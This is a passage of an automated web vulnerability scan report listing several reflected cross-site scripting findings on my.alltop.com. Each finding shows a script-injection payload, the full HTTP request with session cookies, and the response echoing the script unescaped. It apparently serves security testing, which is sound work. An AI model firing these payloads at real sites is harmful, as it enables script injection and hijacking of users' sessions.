1.173. http://my.alltop.com/alpha/o [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90db"><script>alert(1)</script>15dbfcc41db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o?f90db"><script>alert(1)</script>15dbfcc41db=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o?f90db"><script>alert(1)</script>15dbfcc41db=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.174. http://my.alltop.com/alpha/o [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1353"><script>alert(1)</script>b69c5171755 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017D)%3C/script%3Ed1353"><script>alert(1)</script>b69c5171755 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017D)%3C/script%3Ed1353"><script>alert(1)</script>b69c5171755" method="post" accept-charset="utf-8">
...[SNIP]...

1.175. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c6f"><script>alert(1)</script>ca4c78e55e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C28c6f"><script>alert(1)</script>ca4c78e55e/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C28c6f"><script>alert(1)</script>ca4c78e55e/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.176. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 890ea"><script>alert(1)</script>5524fab674 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C890ea"><script>alert(1)</script>5524fab674/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C890ea"><script>alert(1)</script>5524fab674/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.177. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fe1"><script>alert(1)</script>a9f06099045 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C56fe1"><script>alert(1)</script>a9f06099045/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C56fe1"><script>alert(1)</script>a9f06099045/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.178. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b33"><script>alert(1)</script>c67305f2247 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E72b33"><script>alert(1)</script>c67305f2247 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E72b33"><script>alert(1)</script>c67305f2247" method="post" accept-charset="utf-8">
...[SNIP]...

1.179. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55719"><script>alert(1)</script>789ab6f2c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E?55719"><script>alert(1)</script>789ab6f2c47=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E?55719"><script>alert(1)</script>789ab6f2c47=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.180. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%22ns=%22netsparker(0x0001D1)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a8f"><script>alert(1)</script>02144306c7f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/oc1a8f"><script>alert(1)</script>02144306c7f/%22ns=%22netsparker(0x0001D1) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:55 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/oc1a8f"><script>alert(1)</script>02144306c7f/%22ns=%22netsparker(0x0001D1)" method="post" accept-charset="utf-8">
...[SNIP]...

1.181. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%22ns=%22netsparker(0x0001D1)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c44"><script>alert(1)</script>0d4a812929a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

